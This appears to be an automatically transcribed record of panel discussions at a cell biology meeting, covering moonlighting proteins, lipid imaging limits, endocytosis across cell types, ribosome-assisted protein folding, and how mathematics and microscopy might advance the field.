is going to do the same no matter where it is. It's going to function with a different set of proteins. An escort three complex makes filaments no matter whether it does it at the surface, whether it does it at cytokinesis or whether it does it at the surface of an endosome. It might interact with different components. So the signals don't make a circle into a square. It still remains a signal but it can change its interactors based on where it is. A cop-2 coat will make a cop-2 vesicle because it only functions at the ER. These are the hard wired nuts and bolts. 661 will only translocate cargos or newly synthesized proteins at the ER. It will not do it at endosomes for example. So you have to ask the question based on the protein you're interested in. And that can change. But certain proteins do not change their location no matter what you do to them and they don't become something else just because they get a phosphorylation event or a glycosylation event. But maybe an easy way to solve this issue is to distinguish between the activity of a protein and its function. An enzyme is an enzyme. One activity eventually to like an enzymatic activity or a cell fold activity. But this... An enzyme will remain. Any functions that depending on the cell type and localization it can have many outputs. But when you're looking at different pathways in the cells the same function may influence very different processes. So that... Yeah. If you look also Charlie Boone doesn't seem to be in the room but his genetic interaction network you know I think I can't remember that the essential proteins I don't know had nine interactions each the non-essential seven something like that you know which... So each protein does have many different types of interaction... functional interactions and similarly when you do proteomics you know I forget the average protein that pulls out seven other binding proteins and so... You know some core hard definition of moonlighting proteins they have completely different functions and they use different surfaces for these functions. So those are really completely different activities. I work with a protein which is involved in membrane fission. It's also transcription factor exactly the same problem. And the molecular mechanism is very well known the surfaces are different and the functions are totally different. And there are a few examples as I said before it's not clear how many cases of this real multifunctional proteins we have but from the literature I guess so it's not just the change of you know of localization and the same protein the same enzymatic activity does something in a compartment and has a different effect in another compartment that's not a multifunctional protein. But Alberto I beg to differ sorry your protein bars is recruiting an acetyl transferase in doing the fission process and when it's inside the nucleus it recruits an acetyl transferase to acetylate. No it's really very well known it's completely different. Why? Is it not recruiting? No. No but I can simply it's not the case it's not true. It's not true. It's not scaffold it recruits. No it doesn't recruit an acetyl transferase in the nucleus. There are many examples. There are very few examples of those. No no no many. Like with the enzyme function in the nucleus transcription factor for example. Or cytochrome C. Cytochrome C. And many times the name of a protein you know the history influences how people think about it. Which function was discovered first? No there's a canonical function and then the moonlighting activity was discovered after all. And sometimes it's if you are not even sure if it's real or not if it's direct or indirect. The question is how many of these moonlighting proteins really shown to directly be involved in two totally different functions? I don't know. I don't know how many. And also the definition of the criteria should be strict otherwise a protein can do many things. It should be strict. Different surfaces, completely different activities. Then under those criteria I'm not sure how many there are but several I think. Would you call VPS3A a moonlighting protein? I don't know enough. Maybe not. I don't know what it does actually. It's not completely. Do we know? Already so I can't answer that. So all of you guys are working with some membranes in some way or another. And I think a few of you were asked about lipids and none of you talked about lipids and I'm wondering how you feel about them, both in the maybe why it's not relevant to your research or how maybe it is and how you're interested in that or not. Repeat the first few seconds. Lipids. No, because Patricia and I talked about lipids a lot but it was privately. I don't know. Not because. No, no, no, it's a completely different story. It's not related to this meeting. I can't wait until you talk about it. It's a nature of the lipid that's important. Something in the question is the nature of the lipid that's important for the function that you describe. I think one of the things that limit, there are many things that limit studies in the lipid field. One is that you can't monitor them in cells where they are, their dynamics, their exact position of the different species. The same way that can be done with proteins. You can label them and monitor exactly their dynamics. That's a huge advantage. I think people got to Nobel prizes. For lipids, it's a completely, there is no way, it's a completely unexplored territory. Imaging is impossible. It's a big limitation. Biochemistry can be done, but of course it can be done. But again, without imaging, you don't know where they are. For cell biologists, it's a big question that can't be answered. So Tommy is not here, but yesterday he used, I think people are using to look at the lipids, phospholipids, phospho, to use domains of proteins that recognize the lipids specifically. But they sequester lipids. So one has to be careful. But answering his question, there are lipids that are being studied extensively, but they are usually modified lipids. Dysylinosotides, for example, the PIPs, the PIP2s and the PIP3s, Dysylglycerols, they've been studied extensively. But you're talking about lipids that are present in all the membranes, the phosphatidylcholines and the serines and ethanolamines, et cetera, et cetera, et cetera. They are present in all the membranes. What changes is the concentration and their production at any given time. And that becomes very difficult to quantitate. You cannot easily manipulate them. And if you use these kinds of proteins, such as a pH domain of a protein that binds to a phosphoenosotide, sure, you can monitor it. But you don't know what you do to the dynamics because you have bound something and you prevent its consumption. And there is there for that little caveat that you have to be careful. And that is probably one of the major reasons. People think that those methods are not reliable. You can monitor lipids, one with lipid binding proteins, but then you mess up completely the dynamics of that lip. Or you can replace an acyl moiety with a fluorescent molecule, like a body pie or something. But again, it's not the same molecule. So people don't, including myself, people don't trust those data, basically. Now there is things might change now with the advent of imaging mass spec, mass spectrometry. That's going to reach a resolution it has already, but it's not commercial yet, of one square micron. And you can identify 300, 300, 400 lipid species using imaging mass spec. So then you can have big pixels, but you can't get an image there. And the molecular resolution is fantastic. You can distinguish many different species of phosphorid, choline, for instance, because they differ in length of the acyl moieties. So that's going to come. It's here already, basically. Okay, so going off of the VIXED, I was thinking about during David's talk about the math modeling of the endosome formation or whatever. I was curious whether you took, I mean, did you take into account the concentration of the different kinds of lipids that could be there and how that affects the elasticity of the membrane or something? No. We just varied parameters to do with the membrane tension. For most of those models we used, we just modeled the lipid bilayer as an elastic sheet and then varied the properties of that sheet and didn't change anything locally, which probably happens during these processes. So that would be a refinement. But you know that in terms of budding and fusion, you're cutting membranes and you're fusing membranes. And there is no space for lipids in snare mediated fusion event. And there is no space for cop two and cop one mediated cutting. Why? Because it's just been very, very difficult. And in vitro, people kind of don't ever get to measure those things. And in vivo, it's very difficult because unlike proteins where you can do SIRNA and CRISPR and quantitate, you can't really do that with lipids. So it's been a technical challenge, not because of lack of interest or not wanting to study it. Yeah. Well, we had exactly with Dr. Sherfield this morning. She's not here exactly this conversation. She's doing experiments. We are also doing experiments with liposomes and changing the composition of liposomes and looking at how this changes the response of certain proteins. It can be done in liposomes. You control the lipid completely. You know what's there. But when you want to translate this data into in vivo, in cell biology, you have no idea what's going on there. That's the big limitation, essentially. Now, I was going to say that I find it great to this initiative to go to the primary cell and try to redefine in terms of endocytosis and maturation of endocytic compartment, how in primary cells and not in Hila cell this is happening because most of what was found in Hila cell turns out not applied to the primary cell. However, I wanted to have your opinion on how much could you estimate, how much of what you're going to find in the cells you're using, which are not really primary, actually, from what I understand, is going to be general, possible to be generalized. Because my feeling is that when it comes to endocytosis and endocytic vesicle, it's always defined by what it contains. And since all the cells have different activities in terms of receptor and internalization and tissues, finally, can we really find general rules on endocytosis and endocytic trafficking in general? That's the question I asked myself. So what do you tell yourself? Sorry. No, I said you asked yourself. So what do you answer? I mean, we've just looked at one process and we've found that it's remarkably different. So if you look at the literature in endocytosis, different papers using cancer cell lines report very different morphological features for endocytic sites, plaques or round vesicles, very dynamic, very slow. And it's hard to make sense of how those differences came about. Are they physiologically relevant? Because if they are relevant, then they're likely to be important. And then there's some kind of mechanism that adapted that process for the different cell types. And I think if you extrapolate to all the different cell types and then looking in the context of a tissue where you have cell-cell contacts, apical basolateral surfaces, there's going to be differences that you just wouldn't be able to see when you look at things on glass. And then the fact that you can differentiate them into many different cell types. And I think these organoids are, they're imperfect now. Like they don't have a vascular system, but there's just so much effort into improving them that there's going to be a huge push in that direction. So I think all these things are complementary. I think that Tommy, looking in zebrafish, which are very translucent, and you can look in the living animal a lot of intracellular events, those are all good things to do. Now, but this is a general problem. There are around 300 types of cells in mammalians. And I guess I'm basically DNA polymerase, we'd be probably the same in all of them. But as soon as you get a little bit away from these very, very core basic functions, there's obviously a lot of difference amongst cell types. So that's also a big problem when you start to look into the physiology. You know, the physiology means that cell type in that organ, in that context, we are not there. I mean, it's going to take many, many, many years to get there. It's possible to make transgenic mice with that protein. No, sure, but it's a huge amount of work, centuries of work. But listen. No, it is possible. No, just, yeah, just. But listen, you just love of hereditary transgenic mice. You know, if you do a musin's PubMed, you get, I think, something like 15,000 papers or 10,000 papers. And a lot of this has been done in mice. In fact, the whole cystic fibrosis model based on the mouse system turns out to be a complete flop because the human goblet cells of the airways are different from the goblet cells of the gut. We work on this plastic problem and we followed the mouse for years and it turns out the way the airways goblet cells work in our system is completely different and has nothing to do with what happens in a mouse. But some of the issues you can, coming back to the original question raised by the fellow up there in blue shirt, that some of the questions, for example, you asked about generalization. Well, we know that basic mechanism or basic principle of endocytosis and exocytosis is conserved in yeast and in us. So some of the things are going to be conserved and there are no changes to be expected. There might be modules, you know, but the basic concept is the same. The cops do the same thing, yeast and flies and worms and in us. But there are certain things that yeast just does not do. I mean, they don't have bones, they don't spit, you know, they don't think. So of course, studying those things in yeast is liable to give you wrong, might take you in the wrong direction. So it all boils down to what is it that you want to study, what you're capable of doing and how far do you want to stretch it. Lipids are not studied by many of us because it's blasted difficult to get at it, you know, whereas other things are relatively easy, relatively not easy, but they're just relatively easy and people who work on proteasomes and things of that kind, they don't have to worry about their own membranes. You know, they just pure blob of proteins, pure blobs of proteins, you know, so you could get away with it. So I think it's picking your problem carefully and knowing how far you can take it is very important. Are we done? The whole microphone, oh, unless somebody wants to say something about the previous question. No, no, no, just, for instance, in Germany they have an enormous alliance to study liver cells, the liver and liver cells. So all the data are understandable, comparable in one system, but otherwise discussing processes like signaling, for instance, render cytosis in different animals, in different cell types, which is dangerous. One needs to know that. David wants to say something. He was going to, he had a really philosophical, please David, he was complaining, yeah, he keeps asking, is this over? Okay, Vivek, you answer one more question and then you can go. Just you. So what do you think are the big questions that you still want to see answered in this field? In life? In what? In your life? Yeah. In your life. Oh, kind of. Oh, really? What's up with the field? We know the pathways, we know the mechanisms. No, we don't know the pathways. I think this is it. We don't. So what is the question? You know, the folks go around telling the world that we know everything about the trafficking business, so you shouldn't be worrying about it. I mean, I'm sure David gets beaten to jelly that don't we know everything about Acton? And he turns out, well, no, not really. Why what what is it that we don't know? We don't know how Acton can do what it does in so many different forms. And it's the same thing. If you just study VSVG transport, or if you just look at invertase secretion, then it's kind of, yeah, maybe it's over. But if you want to look at the real stuff, then we have no understanding. And the question is, do you want to just say, well, we kind of know the basics, so it's over, or you want to say, no, it isn't. I mean, if you were to talk to George Pilati when he was alive, he used to say, sometimes, not always the same, don't we already know everything about Jim Ruffin said in five years, we'll already figure out everything. So we haven't. We don't. So the question is, do we want to know more players? You're suggesting, you know, that we don't make a problem and solve it, whether it requires new players, knowing lipids, knowing doing stuff in organoids, doing stuff in, you know, whatever, just solve it at whatever the level. I mean, it's simple as that. I think I have, of course, an opinion here. Now, it's been around, the answer has been around for too long, and it's complexity. What we don't understand is the complexity of the biological system. That's systems biology. We have been talking about systems biology for 20 years or so, and it's been disappointing. I think it's, the thing is, that's the real problem, and it has taken a lot of time, and it's going to take more time, but it's the real frontier for the next, I think, 10 or 20 years complexity. Well, I think it's clear what complexity means. Now, it's how the systems work, not the nuts and bolts. Well, now you mentioned Jim Rossman. He's a person who tried to simplify everything. I remember he mentioned once, autophagy. He think it's just one branch of a secretory pathway. I'm not sure Marky heard about that. But in the end, it was much more complicated than that. They earned a Nobel Prize a couple of years ago. So my opinion probably going to be many, many, not only players, but also pathways. We just don't know. I think Jim mentioned that autophagy is just another way to degrade proteins. He didn't say that it's another form of assembling compartments. The idea that you use ubiquitin to then tag proteins and then you to clear them in lysosomes. One could argue that this was shown by Chikanova and Hershko and Varshavski. But I agree that what Osumit did, he basically came up with a whole pathway. It turns out that this pathway is so crucial for so many physiological processes. It goes beyond just doing this inside a cell and throwing it into a container. That is not the case. He can say whatever. We also said openly that protein transfer, we kind of know everything about it. It's not true. But I think if you challenge him, you want on one, he would admit that we don't even know when a vesicle fuses. A vesicle is fusing to the target membrane and there is this pore that expands. How that pore expands is not clear. And it's a very major issue. So I think when you talk, sort of loose talk is very easy and you can say, yeah, we kind of know everything. People say the same thing about transcription and every time you find out, jeez. The reason is what do you want to know about the biological system? For instance, Randy Schekman says, I want to understand that the atomic level, I'm not interested in the atomic level. I think it's fantastic. I think what I need is enough knowledge to predict the behavior of the system when we perturb it. So that problem means dynamic relationships between address and notes and then you have to define them better. But the ability to predict responses quantitatively when we perturb a system, that's what we want to know. And I think this is the problem. It looks like a physical approach. Just a comment on what you said and the system's biology and complexity. I think that systems biology will continue to be disappointing for many years because we just don't know enough. That's the whole point. So I want to agree with the panel that we are still scratching the surface of many. We're still getting a lot of surprises in terms of functions and moon lightings and all the rest of it. In terms of protein activities and functions. And so on the other hand, you have to start somewhere and you have to start trying. So if you go into systems biology, you know you're prone to fail, but there's small advances that will eventually catch up. But it's just trying to get a model of one simple cell and a mathematical model of a simple cell to predict behavior. That's the ultimate goal. We're so far away from that because our technology is just not there. And we're just ignorant. I think we started talking about systems and system biology far too early. So it was bound to be a big disappointment. But I think it's the way. And drugs. It's the same principle. We just don't know enough about the system so you cannot predict. If you could predict the pharma systems would be a lot more efficient than they are. But you keep making drugs, right? Well, yes. So that's again, it's not the reason why there shouldn't be pharma companies. It's and we're achieving some success. It's exactly the same with systems biology. You're achieving a little bit of success, but you cannot expect that you solve the whole thing. Then the mathematicians will come eventually to save us. That's what they're holding left. One of the problems of systems biology is that there is a divide, a separation between models, mathematicians, and real biologists. And I say real biologists. It's important really to fuse, to know exactly what a model means in terms of the molecule, the function you are familiar with. Otherwise, it's going to be models for what? And the classical nuts and bolts biology. This is. Yes.
|
Combining classical and molecular genetics to decipher cellular pathways and mechanisms
|
10.5446/50901 (DOI)
|
So what questions really do you think you can solve? What's next? Because this is like Tommy said, it's like driving hypothesis. So you have the ability to do it. So what are the next questions? So I think the two current things. The two big aims we have at the moment are twofold. One is to try to understand translocation events. But I think on the more simple folding level, it's to try to understand misfolding processes that occur. So in the same way that you have folding processes beginning on the ribsome, you also have the potential branch point for misfolding events to go on. So there are decisions to be made for a nascent polypeptide. And as has been studied for a range of isolated polypeptides, the idea would be to understand how the cellular machinery, in particular how the ribosome surface that I purported today to suggest was behaving as a chaperone for a nascent polypeptide, how it can potentially chaperone the polypeptide to avoid misfolding processes, in particular in tandem repeat domains and many other repeat domains that occur, but also in misfolding prone sequences. There are a range of cases where, of course, you have single point mutations that alter the not necessarily the native structure of the protein, but the dynamics that are sampled by the protein. So the idea would be to understand these processes as they occur during biosensitism. And there's also already significant evidence to suggest that protein misfolding is occurring on the ribosome up to 15% or more of nascent polypeptides are targeted for ubiquitination and degradation as a result of misfolding events. There's a significant amount of stalling that occurs on the ribosome. And there is machinery, the listerine machinery that comes in and separates the two subunits and targets the nascent polypeptide for degradation. So understanding these events, I would imagine, would be the next frontier for us. So you're talking about falling back to on the ribosome and that maybe helps. And you made mutations, what in the protein and on the ribosome? Did you see, did you check your mutations on the ribosome with other proteins other than the one that you showed us? And does it affect in different ways? So we haven't done that. There's actually a paper in the Bajo archive that's just come out showing that you can actually, by taking out some of the similar L24 and L23 proteins, you can alter the position at which an emerging nascent chain begins to fold on the ribosome in a similar way. Now, the purpose of these proteins is unknown. There's a high conservation between prokaryotic and eukaryotic protein, ribosomal proteins, at the exit tunnel. But their influence on folding appears to be unknown as of yet. So all the quality control branch points for misfolding that you talked about were actually things that were worked out in eukaryotes, like the degradation. And you've been working most entirely with E. coli, ribosome so far, right? Not entirely. The work I didn't actually show on misfolding events were on eukaryotic ribosomes, in particular, kind of yeast ribosomes, and rabbit reticular sites, where we actually see more of these misfolding events that are occurring. Yeah, that was actually my question. How much? I didn't realize you were able to do it with eukaryotes. The eukaryotic ribosomes are clearly more complicated than the prokaryotic ones. But that's mainly actually in the initiation machinery, translation initiation, obviously more complicated in eukaryotes. At the exit tunnel of the ribosome, there's actually a significant amount of homology that exists between all of the ribosomes. And actually, in some of the CRISPR targeting that we made, we actually targeted the very small extents of differences that exist between the eukaryotic and the prokaryotic to try to examine some of these events and some of the shifts in the initiation of folding kind of seem to be reflective of the differences between eukaryotic and prokaryotic ribosomes. But certainly, as you may imagine, the structural biology, in particular NMR spectroscopy associated with them, to do things on the E. coli ribosomes is significantly easier than being able to produce these translation, these nascent chain complexes on the human ribosome and so forth. So we don't need the specific labeling events to happen. But electron microscopy is changing much of the face of that, where we can take a range of relatively crude complexes and be able to make classifications from a range of states that are being observed in that case. So I'd be working with eukaryotic ribosomes, which is certainly the way forward. Sorry. What about the secretory proteins? We don't have this interaction with the surface of ribosomes. Do you think there's something replacing it? Well, I mean, I'm assuming, for example, in the serpents that we work with in the microsome states that we use to examine these, we see some extent of similar interaction with the surface of the microsome. We don't know whether it's specific to the ribosome. I mean, these are things, as I was saying earlier, are pitifully under-investigated. And even I pretty much showed you the state of the art today in looking at e-coli ribosomes with simple immunoglobulin systems at a high resolution. So these are really things that need to be investigated in the future. Can I just comment on this? Oh, yeah. So Aaron, you're talking about proteins which are inserted into membranes. But this is co-translationally. If it happens co-translationally, the SRP receptor immediately binds to this textbook thing. So the tech, the SRP is recognized and then it immediately takes it. So it doesn't go through this. And then once it's injected into the lumen of the ER, there will be on the chaperones of the ER to help it formed. I mean, but there are chaperones even on the cytosolic side, for example, that many of the systems we work. The trigger factor, for instance, is omnipresent and actually at higher concentration than ribosome, but doesn't influence the folding equilibrium at all in the states that we've examined. Not necessarily the case that the chaperones will come and mop everything up. I have a question for you, Drone, and for you, Tommy. So we're listening to the first talk and the last talk of today. So I think an important aspect is going to bridge from the structure to the interactions, especially for those proteins that assemble on the surface of membranes, which is what you talked a lot about. So what do you think it will take to be able to look at those interactions in terms of structure and dynamics? So I think at the level of snapshots, yeah, so at the level of snapshots, there are already quite interesting efforts as well doing cryoEM directly in cytosales, right? So there's cryotomography that is happening, which is quite impressive. So I think the snapshot part can be done even with today's methodology already. When you're looking at things in cells, right? On the dynamic side, at least the part that I can bring is we can visualize where the molecules are. Sometimes you can put sensors that can give you some information, even maybe even folding. You can do maybe some fret or something, right? I think that's possible now to do. So I think it's possible it's happening. I agree. I think that in terms of the technique that can really give you a strong understanding of dynamics is NMR. And really tell you about very low populations of intermediate states on folding and misfolding pathways. I think traditionally NMR spectroscopy has been a technique that has been one of the purists who has tended to prefer to develop very complicated pulse sequences on small ubiquitin-like molecules. And I think what I quite like about the things that we're doing is that we're beginning to use NMR on increasingly larger systems. And I think that is what's going to allow the bridge with some of the work we've seen. Because I think that it's actually in terms of exploration of large molecular machinery, NMR is typically in its infancy and higher magnetic field strengths will begin to turn the corner in this regard. So we can begin to provide highly complementary data to that. And I think working more closely with people, I came and I was very, very impressed with these talkers. I think it was everyone. And I think that the capacity to bridge the resolution scale would be absolutely mouthwatering. Just have a question, right? I mean, I brought it up that in your talk. The experiments that you're doing are still ensemble experiments, right? And so I am still confused when I'm looking, let's say, at the various states that you had, whether that was all of them were homogeneous or you were looking at different subsets from different molecules. That wasn't really clear to me, right? That's why we were trying to get at the time connection on the snapshots that you were having. So maybe you can comment on that. So in terms of the electron microscopy that we're doing, we're clearly having various classes of the nascent polypeptide that we're seeing in different states. So they, for example, form the basis of a, just alone, they form the basis of a simulation where the system is started off and is restrained according to these sets. Now, if we, the problem with timescale then goes even further with including the equilibrium NMR data into the process, and NMR has traditionally been a case where you have a set of restraints. You say this distance is so-and-so, and you have a myriad of those types of distances and angular restraints, and you feed these into a structure determination with a view towards achieving a minimum in the normal way that you know about. The way that this is achieved is through, normally, through a molecular dynamics simulation that has a time element associated with the simulation. But these things can be easily recognized, reconciled in sort of biased, restrained molecular dynamics methods, and this is a massive area of NMR spectroscopy that is absolutely routine in this case at the moment. So, answer your question somewhat. Thank you so much. Any more questions for John, if not, because he needs to catch a train. I'm very sorry, I really, really enjoyed this meeting so much, but I should get back for my own... Give it to her. Thank you very much. Bye-bye. Okay. Do you want to ask him a question? We can ask a general question. Please. Yes, for them so that they can record. Ah, no. Then, of course not. I don't want to be recorded at all. Actually, the question is connected with the fact that this nice, very deep and interesting biological meeting takes place in the Mathematical Institute. So, I have a general question to all of you, maybe except the last guy. But still, somehow, it can be applicable to him too. The question is, can you formulate a... Not mathematical, but theoretical question inside your work, inside your subject, on which you can't answer by biological methods only, and for which you need application of some mathematical methods. Not like data analysis, which is statistics, and we all know how it is useful. But exactly mathematical approach, which will answer some question which you have and which needs this approach. So, it is a question for each of you to formulate such theoretical question, or to say no, we don't have, which is also okay too. Please. Start from you and go this way. Okay. I couldn't have lunch today, because... And you already answered, please. Because I talked to Misha one, Misha two, and Andrei, and also I think you're in the discussion at lunch, right? All the Russians, you were not included, because you were... you went away. So, the discussion we had had to do with image pattern recognition, right? So, we have all this data, it's very nice to look at it, right? And how the hell do we now get information out of that? No, but you didn't say... okay, you... You say it's general, whatever, but you don't... okay, it's very nice to have a... No, I can tell you......a range of pattern recognition, but again, what biological... it is nice to formulate... I'll tell you, I'll tell you. Yes, this is exactly my question. It's a biological question, not like a tool to pattern recognition. Biological question, on which your pattern recognition you answered? Why not? No, no, of course yes, of course... no, why not? Yes, but this is not my question. Imagine that I will look... Imagine that I'm going to look at every cell in the brain, okay? And I want to see all the organelles of every cell in the brain. So imagine that I map every single organelle from every cell in a tissue, and now you can look at different responses that the tissue has to pathophysiology, to the standard cell biology, and you can do that without putting markers on that, so you just look at general way of imaging, and you can recognize all the organizations inside the cell, right? So I wouldn't have to generate these specialized cells, I wouldn't have to do transgenic things, I mean just general. And then I can go and do cell physiology, for example, at high level of detail. You don't like that? I don't have to like it. I accept your answer. Okay, I'll give you another one. I'll give you another one. Another one. In the brain, when you're developing the neurons, right? There are cells... What? Stop! Okay, talk to me. Okay. So, okay, you're developing your neurons, not your, but she's... She was developing your neurons. And there's cell fate decisions that are taken, okay? Okay, so now you have an outcome which is the cell... You're getting a neuron of a certain type or a cell of a particular type, but there were signals that happened that said, okay, go to that direction or that direction. Now, up to now, when we have been mapping the signals, they tend to be typically by genetic means, right? You interfere with a pathway and you look what the response was, right? You have the notch pathway, which is a signaling form. You eliminate that and you see, okay, the animal goes gaga, right? And you decide, okay, the neurons doesn't work. That's very primitive, right? I mean, that's okay up to now. But imagine that I can now follow the actual functioning of the pathway. I can follow exactly the where the molecules are. I can tell how many molecules got activated, what regulation went on in gene transcription. And then that is happening at the second level. The cell fate decision and the outcome happens hours after, right? How can I integrate that in the same setting from beginning to end? That's non-trivial. But that's biology in action. Let's say mathematical formalization or mathematical model can give you an explicit answer on this question. I have no idea. Maybe I just don't know. I mean, the only thing I know is that when I was showing you this data, I was showing you this... Oh, no! Can I go on? Wow. Can I finish my... So, I was showing you, for example, this lipid sensor business, right? So this is actually the result of a lot of molecular interactions, binding constants, rates, et cetera, right? So it's very nice that I can say this by words, right? But is this really true? So we had to simulate, you had to make models. Now, maybe for you that's very simple. These were differential equations, et cetera. For me, it's impossibly hard, right? So I need your help. It's not that simple at all, but I still... No, thank you very much for your answer. It's very important and interesting. The only thing that I still did not catch the explicit question. You said that it will be nice, but okay, but never mind. It's me. You answered very well. Thank you. So, let me translate from the rest of the... No, no, no. You will never go to other people. I also want to ask a question. But I think she's asking for falsifiable hypothesis that kind of falls out of the data. What data? A falsifiable hypothesis. What kind of falsifiable hypothesis? Well, something that... Is that true? That's something that falls out of the data and you... Oh, falsifiable hypothesis. Yes. No, it's not a falsifiable hypothesis. It's falsifiable. Yeah, of course. But how can I do that unless you... Help me. Yes, yes. This is... Yes, yes, yes, but still... Yes, I understand. But... Well, frankly, I'm not quite sure I want to answer, but let me try. So, let me give you some very concrete examples. And I'm probably going to get in trouble with a lot of people for saying these things. But for example, in trying to understand in the context of small molecule drugs, where they go in the body, drug distribution, what the bioavailability of those compounds are, they're very large data sets. And we have very simple rule of thumb kinds of rules for what kinds of processes are. But I think models that are based on large data sets, parameterizing those structures, those properties of the compounds, would be very desirable. I mean, I don't see that as a mathematical problem so much as a way of formulating and structuring the data. Now, I'll go to... Getting even more trouble, but I think that there are large fields of biology where mathematical formalism could help a lot. Evolution being one, where I think that having more formal definitions would be helpful, development, those kinds of problems. I have no clue how to start working on those things, but I think that these are areas in the future. You also explained how generally it could be useful, but my question was, do you yourself have some very interesting, very precise question on which you can't answer by biological means only and which desire exact involvement of some mathematical methods to answer explicit one your question. And I'm well aware that mathematics in general is very... I asked exactly about your question in your field, in your work which you presented today, and not like general... No, so the very specific answer, using databases of hundreds to thousands of compounds for which we have known property, say bioavailability, how can I use that data to predict a new compound which has equal bioavailability, but some other property that I wish to have. So I think that these are existing data which are not fully analyzed, which if they were, would help greatly in our work. So in another words, you would like, for example, to have a tool in which as an input you have some described and formalized property and having the databases and applying this tool as an output you get which of these compounds meets the expectation for this... Prediction of new... Prediction of new non-existing compounds which have either better or shared properties. Okay, yeah. So I'm not going to give you any answers you find satisfying, I know that. Don't expect that you have, I just exactly asking, do you have such question? Yeah, I mean, so... Why you should have? This problem we're working on with the Wolbachian, how they affect the reproductive behavior of progeny and females and males, the differences in infection, those things are at a very primitive stage in terms of understanding just the molecules involved. But at some point we'd like to know, you know, people have model, there are a lot of evolutionary biologists working on Wolbachia, you know, what percentage of males need to be infected before it becomes an advantage for females to have basically a defense against that by being infected themselves and having an antidote. I'd like to be able to link that with the molecules that we have, if we know what's the concentration of those molecules, when do they get in, how can we relate those molecules to the predictions based on very broad evolutionary arguments about what's required to establish an infection? Yes, yes, of course. I mean, I've always get puzzled by that type of question. So one is, is it that I need theory, mathematical theory, or is it that I'm looking for help with computational methods to formalize? And I must confess, I, so at the beginning I thought that one in the mathematical theory type thing, I've shifted, and I just feel that right now what I think we need is help with the formalism and the computational part, right? That's, which is, it's a practical thing. I mean, the biologists don't get trained to do that. The people that went through that path don't get that way of thinking. And I think this is part, something we need, right, whether it's applied to what you're trying to do. I'm more interested in the questions formulated in a way that they really seek some theory, as you say. And less computational. So there are problems that I have right now for me and for myself biologists, I need, I feel, the field we, I feel, we dramatically the help with the practice. Yeah, I think the evolutionary, someone mentioned that, that's the traditional area where there's real theory, right? And then a lot of the stuff we're doing is dealing with statistical models to try and say, is this unusual or, or, you know, something interesting. So in the genotype to phenotype thing, you have all these potential interactions, but you never know if the, the network that you map is just a random thing, or if it's something that really is enriched for those interactions that suggest certain pathways are connected and associated with a phenotype. And it's hard to, hard for us to solve that problem. But I don't, I don't see any theory, math theory or, you know, axioms coming out of it. I think this is a question kind of for everyone, but mostly three versus one. I'm just curious, not really, not really. I'm just kind of curious how, yeah. Wait for the question. I'm curious how, like, I think that a lot of microscopy people see like things as like seeing as believing or you can really understand something rather than a genetic interaction model. You guys are doing interaction not through necessarily my microscopy. So I'm kind of curious how you feel about the microscopy going on into Tomas, Tomas's lab. And then the vice versa. If you think the microscopy is more powerful, like, how are your different ways of looking at interactions? What are the pros and cons? I'm going to grab the microscope and correct you. It is seeing is perceiving, not believing. We have to be very careful, meaning that seeing is very powerful impact on our brains the way we think. And I think that can be useful in that it can persuade us to think again about something that we thought we already understood. It can revise our views on something where we have very strong preconceived notions. And I think that's very useful in science because often we sort of get stuck in a rut and we need a large jog in order to get away from that. So I think that that's where imaging has such a powerful role. But it is also one tool that has, well, the point of parking lots for molecules was brought up. How do we know whether what we're looking at is an active state or a biologically relevant state and so on. So we have to be careful in sort of the biases that we bring to the experiment because it can have a powerful impact on how we interpret the data. So my answer will be less philosophical. And just to say, first of all, that it's not the three of us against Tommy. I mean, we actually all use microscopy in some way or another. We just don't use such sophisticated microscopy. So even we are interested in where the molecules are as part of understanding how they might be working in the cell. It's part of knowing their concentrations, knowing when they appear and how they interact with each other. So it's just a part of the understanding for us. It's not the only way of looking at things. But what Tommy's point of view is now is there's so many things that we never even thought of thinking about. And perceived before just seeing something so new is a way to think about new areas of biology. So I think microscopy has lots of nice functions in terms of promoting new ideas and new ways of thinking about things. I'm supposed to say something. Are you sure those are coming? Yeah, yeah, yeah. Look at the size of it. I mean, the yeast model system is built largely on cell biology and genetics. And we try to do biochemistry as best we can. And so I think you need all those things to really figure something out. And now obviously computational biology is the other component that is really driving everything. And when you put it all together, then you might be able to figure something out, right? Why did you ask that question? I think because I feel like this, I'm wondering if you feel like this technique is powerful enough at some point. I mean, okay, so with biology, we were doing all kinds of stuff because we actually can't see what's going on a lot of the time. So we could skirt around the problem by like doing knockouts or whatever. And so I think I was curious whether you felt like future biology lies in these like super high resolution imaging techniques. So before the anatomists existed and they were doing their sections, there was a perception of what life was, right? An animal or a human, right? And then the guys cut and looked and they started to have thoughts. Of course, that was a dead thing, right? But it was influential, right? So they were looking. It didn't define things. It wasn't the last word, but it gave you a mindset where you can then keep moving again, right? I think this is the same. I mean, I think there's not one or the other. It's as he was mentioned right now. You use all these methods. You glue them together. Each one has properties that allow you to do things better than the other, right? When you're doing the imaging, you cannot see the whole global system. It's impossible, right? There are too many variables. You're doing the... Right? So you just... there's different ways in which you are handling this large scale of information and you keep dissecting to try to integrate at the end, right? As it happens, there's a burst right now in this imaging. And that burst, that burst is... this burst happens to be in optical microscopy. And I don't think it's the last word. I think it's just a burst, right? Same as electron microscopy of molybdenum cryoem. There's a spike right now, right? And etc, right? It's a process that keeps evolving, right? And there was the previous spike was in CRISPR. It doesn't keep each field just... So this is... I have a follow-up kind of... I know, I don't know if all of you will have an opinion on this, but in terms of... do you think that... right now, I think one of the few things that my cross-speak can do really well is chromatin stuff, looking at it with the dynamics of chromatin. And I'm curious whether you feel like... I don't know, I feel like Mark, you're maybe... because you have this nucleus, maybe you'll have to move into doing some of that. I don't know, chromatin immunoprecipitation sort of things. And then I guess with the microscopy, how can you... do you think that it will ever move forward enough to hit that, to go that deep? I just can tell you that a few years ago I was fascinated by splicing. So I had a friend of mine in Lisbon, Karma Fonseca, I said, hey, Karma, can we just look at splicing? So she developed a system and then we managed to follow splicing in real time in a single locus, and the coupling to transcription, right? And that was done by imaging. There was a huge amount of background before that, based on biochemistry and genetics, but there was also lots of discussion on whether these things were correlated or not. And the experiments were done as an ensemble experiment, right? So suddenly when you were able to look at this and really see it, it's, oh my God, they happened to be coupled. And okay, some people had postulated that and some people were against that, okay? No more discussion, right? I think it depends on the problem, depends on the time. I think what you're saying is fascinating that people trying to do that, just trying to map where transcription factors are coming and the kinetics and dynamics and how they're walking through. And yeah, I think it's, yeah, lots of new cool things. Yeah, following up, unless there are other questions. I think that there are sort of two kinds of processes that we can look at. We can look at bulk processes, which are fairly easy and usually amenable to ensemble methods. But then if we want to look at, if you will, specific processes at a specific genetic or cellular locus, then we need imaging or other tools that differentiate them 